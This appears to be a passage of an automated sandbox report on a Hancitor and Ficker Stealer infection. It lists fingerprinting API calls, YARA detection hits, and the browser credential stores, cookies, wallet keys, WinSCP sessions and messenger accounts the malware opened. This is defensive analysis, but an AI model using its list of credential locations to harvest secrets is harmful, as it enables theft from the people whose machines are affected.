Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\SysWOW64\svchost.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\Documents VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02135256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_02135256
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa, 5_2_00415800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02111AA0 GetVersion,wsprintfA,wsprintfA, 3_2_02111AA0
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ficker Stealer
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Remote Access Functionality:

Yara detected Ficker Stealer
Source: Yara match File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY
Yara detected Hancitor
Source: Yara match File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY